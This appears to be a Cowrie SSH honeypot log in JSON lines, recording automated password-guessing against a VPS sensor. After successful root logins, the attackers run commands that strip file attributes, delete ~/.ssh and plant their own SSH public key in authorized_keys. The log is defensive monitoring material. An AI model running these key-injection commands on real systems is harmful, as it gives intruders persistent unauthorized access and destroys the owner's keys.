{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:06:46.247375Z","src_ip":"212.227.235.229","session":"7e42bc43f524"}
{"eventid":"cowrie.login.success","username":"root","password":"2wsx#EDC4rfv","message":"login attempt [root/2wsx#EDC4rfv] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:06:47.118937Z","src_ip":"212.227.235.229","session":"7e42bc43f524"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:06:47.992527Z","src_ip":"212.227.235.229","session":"7e42bc43f524"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:06:47.993311Z","src_ip":"212.227.235.229","session":"7e42bc43f524"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:06:47.994174Z","src_ip":"212.227.235.229","session":"7e42bc43f524"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:06:48.203220Z","src_ip":"212.227.235.229","session":"7e42bc43f524"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:06:48.634782Z","src_ip":"212.227.235.229","session":"7e42bc43f524"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:06:48.635621Z","src_ip":"212.227.235.229","session":"7e42bc43f524"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:06:48.845087Z","src_ip":"212.227.235.229","session":"7e42bc43f524"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:06:48.846115Z","src_ip":"212.227.235.229","session":"7e42bc43f524"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58062,"dst_ip":"1.2.3.4","dst_port":22,"session":"663a208cb37f","protocol":"ssh","message":"New connection: 212.227.235.229:58062 (1.2.3.4:22) [session: 663a208cb37f]","sensor":"my-vps","timestamp":"2025-08-28T16:06:49.079619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:06:49.080615Z","src_ip":"212.227.235.229","session":"663a208cb37f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:06:49.305969Z","src_ip":"212.227.235.229","session":"663a208cb37f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:06:50.248489Z","src_ip":"212.227.235.229","session":"663a208cb37f"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:06:51.475940Z","src_ip":"212.227.235.229","session":"663a208cb37f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58066,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e3d7a852dd2","protocol":"ssh","message":"New connection: 212.227.235.229:58066 (1.2.3.4:22) [session: 8e3d7a852dd2]","sensor":"my-vps","timestamp":"2025-08-28T16:06:51.681319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:06:51.682232Z","src_ip":"212.227.235.229","session":"8e3d7a852dd2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:06:51.897868Z","src_ip":"212.227.235.229","session":"8e3d7a852dd2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:06:52.801474Z","src_ip":"212.227.235.229","session":"8e3d7a852dd2"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:06:53.018504Z","src_ip":"212.227.235.229","session":"7e42bc43f524"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:06:53.019639Z","src_ip":"212.227.235.229","session":"8e3d7a852dd2"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55862,"dst_ip":"1.2.3.4","dst_port":22,"session":"82184e984e85","protocol":"ssh","message":"New connection: 217.72.205.35:55862 (1.2.3.4:22) [session: 82184e984e85]","sensor":"my-vps","timestamp":"2025-08-28T16:06:54.751783Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:06:54.753028Z","src_ip":"217.72.205.35","session":"82184e984e85"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36555,"dst_ip":"1.2.3.4","dst_port":22,"session":"328899eb14e6","protocol":"ssh","message":"New connection: 212.227.235.229:36555 (1.2.3.4:22) [session: 328899eb14e6]","sensor":"my-vps","timestamp":"2025-08-28T16:07:22.552258Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T16:07:22.553166Z","src_ip":"212.227.235.229","session":"328899eb14e6"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T16:07:22.686861Z","src_ip":"212.227.235.229","session":"328899eb14e6"}
{"eventid":"cowrie.login.failed","username":"mohammed","password":"mohammed","message":"login attempt [mohammed/mohammed] failed","sensor":"my-vps","timestamp":"2025-08-28T16:07:23.285551Z","src_ip":"212.227.235.229","session":"328899eb14e6"}
{"eventid":"cowrie.login.failed","username":"mohammed","password":"abc123","message":"login attempt [mohammed/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T16:07:24.418866Z","src_ip":"212.227.235.229","session":"328899eb14e6"}
{"eventid":"cowrie.login.failed","username":"mohammed","password":"abcd123","message":"login attempt [mohammed/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T16:07:25.550879Z","src_ip":"212.227.235.229","session":"328899eb14e6"}
{"eventid":"cowrie.login.failed","username":"mohammed","password":"abcd1234","message":"login attempt [mohammed/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T16:07:26.681940Z","src_ip":"212.227.235.229","session":"328899eb14e6"}
{"eventid":"cowrie.login.failed","username":"mohammed","password":"abc1234","message":"login attempt [mohammed/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T16:07:27.813510Z","src_ip":"212.227.235.229","session":"328899eb14e6"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:07:28.945879Z","src_ip":"212.227.235.229","session":"328899eb14e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49452,"dst_ip":"1.2.3.4","dst_port":22,"session":"6aa6cfdbf2c7","protocol":"ssh","message":"New connection: 212.227.235.229:49452 (1.2.3.4:22) [session: 6aa6cfdbf2c7]","sensor":"my-vps","timestamp":"2025-08-28T16:07:29.496819Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:07:29.497733Z","src_ip":"212.227.235.229","session":"6aa6cfdbf2c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:07:29.711689Z","src_ip":"212.227.235.229","session":"6aa6cfdbf2c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55840,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb8b718ddd0f","protocol":"ssh","message":"New connection: 212.227.235.229:55840 (1.2.3.4:22) [session: eb8b718ddd0f]","sensor":"my-vps","timestamp":"2025-08-28T16:07:30.081576Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:07:30.082527Z","src_ip":"212.227.235.229","session":"eb8b718ddd0f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:07:30.387371Z","src_ip":"212.227.235.229","session":"eb8b718ddd0f"}
{"eventid":"cowrie.login.success","username":"root","password":"123465","message":"login attempt [root/123465] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:07:30.606934Z","src_ip":"212.227.235.229","session":"6aa6cfdbf2c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:07:31.052105Z","src_ip":"212.227.235.229","session":"6aa6cfdbf2c7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:07:31.052851Z","src_ip":"212.227.235.229","session":"6aa6cfdbf2c7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:07:31.053683Z","src_ip":"212.227.235.229","session":"6aa6cfdbf2c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:07:31.268334Z","src_ip":"212.227.235.229","session":"6aa6cfdbf2c7"}
{"eventid":"cowrie.login.success","username":"root","password":"ZXCzxc123","message":"login attempt [root/ZXCzxc123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:07:31.665128Z","src_ip":"212.227.235.229","session":"eb8b718ddd0f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:07:31.762610Z","src_ip":"212.227.235.229","session":"6aa6cfdbf2c7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:07:31.763605Z","src_ip":"212.227.235.229","session":"6aa6cfdbf2c7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:07:31.978631Z","src_ip":"212.227.235.229","session":"6aa6cfdbf2c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:07:31.979861Z","src_ip":"212.227.235.229","session":"6aa6cfdbf2c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50584,"dst_ip":"1.2.3.4","dst_port":22,"session":"84a9ce5d61fa","protocol":"ssh","message":"New connection: 212.227.235.229:50584 (1.2.3.4:22) [session: 84a9ce5d61fa]","sensor":"my-vps","timestamp":"2025-08-28T16:07:32.226166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:07:32.227430Z","src_ip":"212.227.235.229","session":"84a9ce5d61fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:07:32.301899Z","src_ip":"212.227.235.229","session":"eb8b718ddd0f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:07:32.302887Z","src_ip":"212.227.235.229","session":"eb8b718ddd0f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:07:32.303874Z","src_ip":"212.227.235.229","session":"eb8b718ddd0f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:07:32.464121Z","src_ip":"212.227.235.229","session":"84a9ce5d61fa"}
